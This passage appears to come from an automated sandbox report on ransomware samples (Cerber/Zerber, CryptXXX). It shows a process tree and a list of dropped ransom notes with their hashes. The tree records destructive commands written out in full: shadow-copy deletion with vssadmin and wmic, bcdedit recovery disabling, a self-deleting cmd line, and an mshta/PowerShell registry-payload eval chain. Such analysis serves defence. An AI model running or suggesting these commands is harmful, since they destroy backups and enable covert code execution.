                                PID:2620
                                • C:\Windows\SysWOW64\cmd.exe
                                  /d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.eck-f25d03efc63cba1a262034382f809aaa5918f218b965164897df0c989a08dd04.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.eck-f25d03efc63cba1a262034382f809aaa5918f218b965164897df0c989a08dd04.exe" > NUL
                                  5⤵
                                  • System Network Configuration Discovery: Internet Connection Discovery
                                  PID:2428
                                • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                                  "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2896
                                  • C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe
                                    "C:\Users\Admin\AppData\Roaming\{3948277D-206E-C453-92EF-7A792F7F3E4D}\fsutil.exe"
                                    6⤵
                                    • Cerber
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:468
                                    • C:\Windows\system32\vssadmin.exe
                                      "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                                      7⤵
                                      • Interacts with shadow copies
                                      PID:1872
                                    • C:\Windows\system32\wbem\wmic.exe
                                      "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
                                      7⤵
                                        PID:2868
                                      • C:\Windows\System32\bcdedit.exe
                                        "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
                                        7⤵
                                        • Modifies boot configuration data using bcdedit
                                        PID:200
                                      • C:\Windows\System32\bcdedit.exe
                                        "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
                                        7⤵
                                        • Modifies boot configuration data using bcdedit
                                        PID:1596
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.eck-f25d03efc63cba1a262034382f809aaa5918f218b965164897df0c989a08dd04.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.eck-f25d03efc63cba1a262034382f809aaa5918f218b965164897df0c989a08dd04.exe" > NUL
                                    5⤵
                                    • System Network Configuration Discovery: Internet Connection Discovery
                                    PID:2972
                              • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.eftz-5c307ec12ff794fca96899a8a976351f7ecdbd96e9f5bc56240be033c4b3b615.exe
                                Trojan-Ransom.Win32.Zerber.eftz-5c307ec12ff794fca96899a8a976351f7ecdbd96e9f5bc56240be033c4b3b615.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:1296
                              • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.eghs-66c4d890a1dfcaf3ac26c532e5cda57ffff0a5f7259e17a699f1a1df84eb140d.exe
                                Trojan-Ransom.Win32.Zerber.eghs-66c4d890a1dfcaf3ac26c532e5cda57ffff0a5f7259e17a699f1a1df84eb140d.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:1772
                              • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.lhk-232d7b5fb78f26d938afbb010815e8f8b50213dc0bc9b211f1138c22881feb63.exe
                                Trojan-Ransom.Win32.Zerber.lhk-232d7b5fb78f26d938afbb010815e8f8b50213dc0bc9b211f1138c22881feb63.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:1812
                              • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.umg-9d81ae44a0010d5096ac62b43f169b74750bfe5156070edecc0982d880dd0ef3.exe
                                Trojan-Ransom.Win32.Zerber.umg-9d81ae44a0010d5096ac62b43f169b74750bfe5156070edecc0982d880dd0ef3.exe
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                • Suspicious behavior: MapViewOfSection
                                PID:2072
                                • C:\Users\Admin\Desktop\00293\Trojan-Ransom.Win32.Zerber.umg-9d81ae44a0010d5096ac62b43f169b74750bfe5156070edecc0982d880dd0ef3.exe
                                  Trojan-Ransom.Win32.Zerber.umg-9d81ae44a0010d5096ac62b43f169b74750bfe5156070edecc0982d880dd0ef3.exe
                                  4⤵
                                  • Cerber
                                  • Executes dropped EXE
                                  PID:2156
                              • C:\Users\Admin\Desktop\00293\UDS-Trojan-Ransom.Win32.CryptXXX.sb-0d042942ca11f339297e95d894751895e056a96308a9317833c8e3f8a6141c9d.exe
                                UDS-Trojan-Ransom.Win32.CryptXXX.sb-0d042942ca11f339297e95d894751895e056a96308a9317833c8e3f8a6141c9d.exe
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:2684
                                • C:\Users\Admin\AppData\Local\Temp\ddacabfcdbib.exe
                                  C:\Users\Admin\AppData\Local\Temp\ddacabfcdbib.exe 5-0-2-1-2-7-6-2-5-8-3 KlBHQzsvLTYbJ1BQQk5IQjYqHipGQk9XTVFJQj47LBgsP0lRU0c9NzMvLB0qQ0dDOykaLUtKTD9VQVNdQj47Ly4uGy9RRFBPP1BaTU9HPWZzcmk0LSprb3EuQkRRRCdSSkgqPFBOLUdHQE0bJ0BHSUFKRz03Hio8Ljg0LjcxKjEzGydBLT01MjMZKUIuNSosIC1DMjYnLxsnQTA9KzAeKEpQSjxSPlRdT1BCUD8+UTobL05RTT1PQU9XQlBMPzweKEpQSjxSPlRdTT9GPztPTh0qRVZEXU5MSjgYLEBYQ15BRj5KREZCOCAtR01MTl09SkxSU0NROy4aLU9APklLV05TWE9QRzUdKlZLPDAZKUJOKTobL1BUTE1DS0BXVEBMQU5LPkNLPD9CUFJKPB4oQ1FaSlJJVEdMQzZucHBdHSpSQ1NTS0hHST9cUFNDUV09O1dONS8bL0ZIQj5SOywYLERTXUNXRztLRDtcQE5BUVdJTkM/NWNcbHFkHig+TVJGSUpBQl5HSTcwKzArLDEuLTcsKC8tKh0qVEdMQzYrMi0vNC05LzcwGSlCSk9LR08/Q11NQ0tANTAqMy4uMCkrMyUrNy02ODEwI0pL
                                  4⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:1016
                                  • C:\Windows\SysWOW64\Wbem\wmic.exe
                                    wmic /output:C:\Users\Admin\AppData\Local\Temp\81731865188.txt bios get serialnumber
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2656
                                  • C:\Windows\SysWOW64\Wbem\wmic.exe
                                    wmic /output:C:\Users\Admin\AppData\Local\Temp\81731865188.txt bios get version
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2120
                                  • C:\Windows\SysWOW64\Wbem\wmic.exe
                                    wmic /output:C:\Users\Admin\AppData\Local\Temp\81731865188.txt bios get version
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2716
                                  • C:\Windows\SysWOW64\Wbem\wmic.exe
                                    wmic /output:C:\Users\Admin\AppData\Local\Temp\81731865188.txt bios get version
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2464
                                  • C:\Windows\SysWOW64\Wbem\wmic.exe
                                    wmic /output:C:\Users\Admin\AppData\Local\Temp\81731865188.txt bios get version
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:224
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 368
                                    5⤵
                                    • Loads dropped DLL
                                    • Program crash
                                    PID:2252
                            • C:\Windows\system32\taskmgr.exe
                              "C:\Windows\system32\taskmgr.exe" /4
                              2⤵
                              • Loads dropped DLL
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:3028
                            • C:\Windows\System32\vssadmin.exe
                              "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                              2⤵
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Interacts with shadow copies
                              PID:784
                            • C:\Windows\system32\taskmgr.exe
                              "C:\Windows\system32\taskmgr.exe" /4
                              2⤵
                              • Loads dropped DLL
                              • Suspicious use of FindShellTrayWindow
                              PID:2820
                            • C:\Windows\system32\taskmgr.exe
                              "C:\Windows\system32\taskmgr.exe" /4
                              2⤵
                                PID:1548
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                2⤵
                                  PID:2548
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2409758,0x7fef2409768,0x7fef2409778
                                    3⤵
                                      PID:2240
                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                    "C:\Program Files\Internet Explorer\iexplore.exe"
                                    2⤵
                                    • Modifies Internet Explorer Phishing Filter
                                    • Modifies Internet Explorer settings
                                    • Suspicious use of SetWindowsHookEx
                                    PID:448
                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:448 CREDAT:275457 /prefetch:2
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      • Modifies Internet Explorer settings
                                      • Suspicious use of SetWindowsHookEx
                                      PID:940
                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:448 CREDAT:799757 /prefetch:2
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      • Modifies Internet Explorer settings
                                      • Suspicious use of SetWindowsHookEx
                                      PID:3972
                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:448 CREDAT:734221 /prefetch:2
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      • Modifies Internet Explorer settings
                                      • Suspicious use of SetWindowsHookEx
                                      PID:3380
                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:448 CREDAT:930835 /prefetch:2
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      • Modifies Internet Explorer settings
                                      • Suspicious use of SetWindowsHookEx
                                      PID:3740
                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:448 CREDAT:996366 /prefetch:2
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      • Modifies Internet Explorer settings
                                      • Suspicious use of SetWindowsHookEx
                                      PID:3756
                                  • C:\Windows\system32\rundll32.exe
                                    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Downloads\FD8BDF412DD53D77
                                    2⤵
                                    • Modifies registry class
                                    PID:2128
                                  • C:\Windows\system32\taskmgr.exe
                                    "C:\Windows\system32\taskmgr.exe" /4
                                    2⤵
                                    • Loads dropped DLL
                                    PID:3952
                                • C:\Windows\system32\DllHost.exe
                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                  1⤵
                                    PID:900
                                  • C:\Windows\system32\conhost.exe
                                    \??\C:\Windows\system32\conhost.exe "-2097112986230851570-1414800950-2103494792-677496434-109055203415618296141324722264"
                                    1⤵
                                      PID:2604
                                    • C:\Windows\system32\conhost.exe
                                      \??\C:\Windows\system32\conhost.exe "710016460181157307251185309-16939756962032369104-1832865331540928936-1356303096"
                                      1⤵
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:288
                                    • C:\Windows\system32\conhost.exe
                                      \??\C:\Windows\system32\conhost.exe "779261563-8851502551291512031-1825792408-268873716-904481705-1567690898-327631823"
                                      1⤵
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:856
                                    • C:\Windows\system32\conhost.exe
                                      \??\C:\Windows\system32\conhost.exe "15814796746778154151302866083-12774757441602940102-979717966-1015261619748148200"
                                      1⤵
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of SetWindowsHookEx
                                      PID:3008
                                    • C:\Windows\system32\conhost.exe
                                      \??\C:\Windows\system32\conhost.exe "-9943979601950876343-1148589387337874102-15231873611922583890981142537-2035741589"
                                      1⤵
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:1928
                                    • C:\Windows\system32\DllHost.exe
                                      C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                      1⤵
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:1648
                                    • C:\Windows\system32\mshta.exe
                                      "C:\Windows\system32\mshta.exe" javascript:bB8hfUVlF="GY2N";CK7=new%20ActiveXObject("WScript.Shell");xqWoQ51qS="7adDxDuYj";mG5we=CK7.RegRead("HKLM\\software\\Wow6432Node\\Rx0cAxF00\\wK0J3473AL");f1ku2iHsp="2lUX";eval(mG5we);R0lROH8A="Wp";
                                      1⤵
                                      • Process spawned unexpected child process
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:2812
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:jdwqvr
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: MapViewOfSection
                                        PID:316
                                        • C:\Windows\SysWOW64\regsvr32.exe
                                          regsvr32.exe
                                          3⤵
                                          • Looks for VirtualBox Guest Additions in registry
                                          • Looks for VirtualBox drivers on disk
                                          • Adds policy Run key to start application
                                          • Looks for VMWare Tools registry key
                                          • Checks BIOS information in registry
                                          • Adds Run key to start application
                                          • Maps connected drives based on registry
                                          • System Location Discovery: System Language Discovery
                                          • Modifies Internet Explorer settings
                                          • Suspicious behavior: MapViewOfSection
                                          PID:2484
                                          • C:\Windows\SysWOW64\regsvr32.exe
                                            "C:\Windows\SysWOW64\regsvr32.exe"
                                            4⤵
                                              PID:1516
                                      • C:\Windows\system32\DllHost.exe
                                        C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                        1⤵
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:1892
                                      • C:\Windows\system32\vssvc.exe
                                        C:\Windows\system32\vssvc.exe
                                        1⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2988
                                      • C:\Windows\system32\conhost.exe
                                        \??\C:\Windows\system32\conhost.exe "-2056864727-119582718114050008751210078619-536721718-158826225371169398481078981"
                                        1⤵
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:1908
                                      • C:\Windows\system32\conhost.exe
                                        \??\C:\Windows\system32\conhost.exe "-1772939062-391346014-859578196-7725443986823917181141276007426579924-1178309767"
                                        1⤵
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:2280
                                      • C:\Windows\system32\conhost.exe
                                        \??\C:\Windows\system32\conhost.exe "394104633467982519147484344818772968881922698729-142011952919856146-2076843098"
                                        1⤵
                                          PID:2144
                                        • C:\Windows\system32\conhost.exe
                                          \??\C:\Windows\system32\conhost.exe "213091137612313621251606035851545619445-187667752949073205515665117451394696437"
                                          1⤵
                                            PID:2188
                                          • C:\Windows\system32\conhost.exe
                                            \??\C:\Windows\system32\conhost.exe "-1818496215-968802290-856047379-671997172-1885651694-1254912632485369724-1060803665"
                                            1⤵
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of SetWindowsHookEx
                                            PID:712
                                          • C:\Windows\system32\DllHost.exe
                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                            1⤵
                                              PID:2956
                                            • C:\Windows\SysWOW64\DllHost.exe
                                              C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
                                              1⤵
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of FindShellTrayWindow
                                              PID:2704
                                            • C:\Windows\system32\DllHost.exe
                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                              1⤵
                                                PID:2000
                                              • C:\Windows\system32\DllHost.exe
                                                C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                1⤵
                                                  PID:2608
                                                • C:\Windows\system32\conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe "-744713243-15483819051060845573129507662014238448441476390636-6544389141344148593"
                                                  1⤵
                                                    PID:2464
                                                  • C:\Windows\system32\DllHost.exe
                                                    C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                    1⤵
                                                      PID:484
                                                    • C:\Windows\system32\DllHost.exe
                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                      1⤵
                                                        PID:2472
                                                      • C:\Windows\system32\DllHost.exe
                                                        C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                        1⤵
                                                          PID:2520
                                                        • C:\Windows\system32\DllHost.exe
                                                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                          1⤵
                                                            PID:2404
                                                          • C:\Windows\system32\DllHost.exe
                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                            1⤵
                                                              PID:3288
                                                            • C:\Windows\system32\DllHost.exe
                                                              C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                              1⤵
                                                                PID:3184
                                                              • C:\Windows\SysWOW64\DllHost.exe
                                                                C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
                                                                1⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3384
                                                              • C:\Windows\system32\conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe "1515703329-1985206076341489689-2111122006-4764630831561695879-6074262651416311785"
                                                                1⤵
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:3920
                                                              • C:\Windows\system32\DllHost.exe
                                                                C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                1⤵
                                                                  PID:3440
                                                                • C:\Windows\system32\DllHost.exe
                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                  1⤵
                                                                    PID:3720
                                                                  • C:\Windows\system32\DllHost.exe
                                                                    C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                    1⤵
                                                                      PID:3304
                                                                    • C:\Windows\system32\DllHost.exe
                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                      1⤵
                                                                        PID:2960
                                                                      • C:\Windows\system32\DllHost.exe
                                                                        C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                        1⤵
                                                                          PID:2228
                                                                        • C:\Windows\SysWOW64\DllHost.exe
                                                                          C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                                                                          1⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:4196
                                                                        • C:\Windows\system32\AUDIODG.EXE
                                                                          C:\Windows\system32\AUDIODG.EXE 0x488
                                                                          1⤵
                                                                            PID:3460
                                                                          • C:\Windows\system32\DllHost.exe
                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                            1⤵
                                                                              PID:3540
                                                                            • C:\Windows\system32\DllHost.exe
                                                                              C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                              1⤵
                                                                                PID:3572
                                                                              • C:\Windows\system32\DllHost.exe
                                                                                C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                1⤵
                                                                                  PID:4736
                                                                                • C:\Windows\system32\DllHost.exe
                                                                                  C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                  1⤵
                                                                                    PID:2464
                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                    C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                    1⤵
                                                                                      PID:4116
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                      1⤵
                                                                                        PID:332
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                        1⤵
                                                                                          PID:2424

                                                                                        Network

                                                                                        MITRE ATT&CK Enterprise v15

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+wpvuf.html

                                                                                          Filesize

                                                                                          9KB

                                                                                          MD5

                                                                                          886ef19975f74c2886f0968c8c3a0338

                                                                                          SHA1

                                                                                          f4657ee3cecf2459f738901ff4327130b4f759b4

                                                                                          SHA256

                                                                                          cbe25728003b77630ea06fc48fe8ec2b5202af0c5fd55fbd1b9c017cb5dcd0e8

                                                                                          SHA512

                                                                                          33d20d2d7145cacc45b9bc320b6502bb5d333a72bbdd1e638ea047f5de367e0686693ddd80738652e6830456e468761b96f6ddc57a71fdb97ef274433dc2f594

                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+wpvuf.png

                                                                                          Filesize

                                                                                          68KB

                                                                                          MD5

                                                                                          83fceca6684ada988ddf2c74e75bfe55

                                                                                          SHA1

                                                                                          7524465864e441ce9a9547e7f5837d358daec4b8

                                                                                          SHA256

                                                                                          54d95210a62bfc133d8b36cdcac6fa075f393ceec62bb16d30ae1fc451faef97

                                                                                          SHA512

                                                                                          3e4708fb24c9907bf0082e7c2d83118f763569bb6be99f4d37ed83a4d68dce7a101a26386f1d9a9c21660787b35cdc7e4f2f737fc12c3d6d5020ac981b02c6b4

                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+wpvuf.txt

                                                                                          Filesize

                                                                                          2KB

                                                                                          MD5

                                                                                          8a56e501ad7cf98b39793e3a427b864a

                                                                                          SHA1

                                                                                          436405ac686bfa66d14c25e7cf4268eab89ac6a3

                                                                                          SHA256

                                                                                          59dd0dfebf784aadd8cea323b364f22236ecf63cf41bd97e72513db34d5b301d

                                                                                          SHA512

                                                                                          0e833c6a77c7bd5a3b4e39a7033d8ec7b6f3eeee90e275649af89ed41af80053dd0013798ac06a94e7c726181c9c0f46bc5dd7c58f6e8dd1a3bd66fce54b30c5

                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+cvhwj.html

                                                                                          Filesize

                                                                                          14KB

                                                                                          MD5

                                                                                          614044fe561bfea34b6af3de0ea376df

                                                                                          SHA1

                                                                                          66b24cf15014daa4900b6b9554c812d28be5bf0e

                                                                                          SHA256

                                                                                          760cbf28754f3d6a3fe32fc2561fc83f211d9dec0c877a3f97f82b296e849201

                                                                                          SHA512

                                                                                          c8ba55930a2a086df40cb8505b94bc1651818d5db67c9a59019996fbf2f5db9b43459835915be960bb736048062c045097189a96a7057df79e68c8d644939aea

                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+cvhwj.png

                                                                                          Filesize

                                                                                          64KB

                                                                                          MD5

                                                                                          e00c3fa4269edf3c92625e52744e564b

                                                                                          SHA1

                                                                                          f91ba2b9386cb790214e49c30cc48d6a045b8881

                                                                                          SHA256

                                                                                          58cfa4352eb13784a1a7255080851c7b7f576180bed957a7a90834a164992180

                                                                                          SHA512

                                                                                          81d61861a8942e9bcb961ba8e7c3c9e13e3036847485e8deb2933886711956fd7e65108691338d4c9bc32122ada663e5f0dd972a5e02d2701bff7268cfef530e

                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+cvhwj.txt

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          6a3d66603c1b9fd2d0fb317d6b88eff3

                                                                                          SHA1

                                                                                          360ca1ff961cc3c236facc86efb070f9611eecc7

                                                                                          SHA256

                                                                                          1672bb5500444f6f6f03b769f02fa78b54fd46e0f6cf705433c108acdd4e3ae8

                                                                                          SHA512

                                                                                          4cbf06cc56a15168adb2a43c8f4b72855446d19ce7ac8777fb0870b49d61707fecae9e79a6f171792ff5158c3de25a7f03c4a1089fb288b11b92862100bb2b4e

                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\how_recover+uky.html

                                                                                          Filesize

                                                                                          9KB

                                                                                          MD5

                                                                                          65ae3625a111e9f6f223e84bb2dcf515

                                                                                          SHA1

                                                                                          2b10a3d3838082e72e5bf90f7deb7869c16d92e6

                                                                                          SHA256

                                                                                          57d42d3d0dd8cc44d215050e87e6d1e9163081c41f06647c3225814158407ce3

                                                                                          SHA512

                                                                                          1934990e145a4d3033c86ca7d6c162c7dd2397dc3a958ee76eb979ddb7aa706a7cd1cf2e3c3d70fd56e98deb9da52b21a2b43a7b1d6cf9cb5382ebeb92e55e6d

                                                                                        • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\how_recover+uky.txt

                                                                                          Filesize

                                                                                          2KB

                                                                                          MD5

                                                                                          4e41078d7bc467e2f27f1f97d2feeb8d

                                                                                          SHA1

                                                                                          cfb62242503feddcb92a470c24ea052353bf2c1d

                                                                                          SHA256

                                                                                          5d43543704db85daee0f86b816497766cdc621ebc8e2c040c12b50db5cd844fe

                                                                                          SHA512

                                                                                          ad89bce2f5abb232b406a89a9e979a0922d1ec7c3465a68c04186922096b04397dfc823584707352501a85a1e2485e063fc87d8394ab546785d10a4704764acb

                                                                                        • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

                                                                                          Filesize

                                                                                          11KB

                                                                                          MD5

                                                                                          6ada5d5c1576534ebd093dd40298f97b

                                                                                          SHA1

                                                                                          b71877ba7e44a672a6240f566fac7e65da43b0d2

                                                                                          SHA256

                                                                                          d6fdc142c80302cef8093193f05eda46eaad25e44f482f439357568fd99b275c

                                                                                          SHA512

                                                                                          fc3df42f70d9874d3e201b7def37dbe607568f11c19474d14a93dbe6627784759f7197748c93c1c232f70bb16642cb9efcc588c8dd2ebeefe744eb4df9d1b0ed

                                                                                        • C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt

                                                                                          Filesize

                                                                                          109KB

                                                                                          MD5

                                                                                          c080b66c3563215884671da0aac85d39

                                                                                          SHA1

                                                                                          fc6b8014a94d0be0e6b8a3fdfce164cc656754ef

                                                                                          SHA256

                                                                                          e4d925424b7eee29159971abdf6297a872cf50233d5c078c6022d137ad3a66ea

                                                                                          SHA512

                                                                                          64c91375c17e481c4d6b0589db3463927c2f026405d10a546085c52e95339923bd2e55b02a14e5b2436b46d6d9e158a2e5ea3d7d5a1e68b7bddc8bcdf91ca5a2

                                                                                        • C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt

                                                                                          Filesize

                                                                                          173KB

                                                                                          MD5

                                                                                          ea71a9b36f68c9da21260a7a7de694bb

                                                                                          SHA1

                                                                                          186c50282d90011b8988aff3a0eb7cee2500e99b

                                                                                          SHA256

                                                                                          eadafae611933580e4527209189f0621bb9ad8c6e58f0cb8ee8342d3cd9fa0dd

                                                                                          SHA512

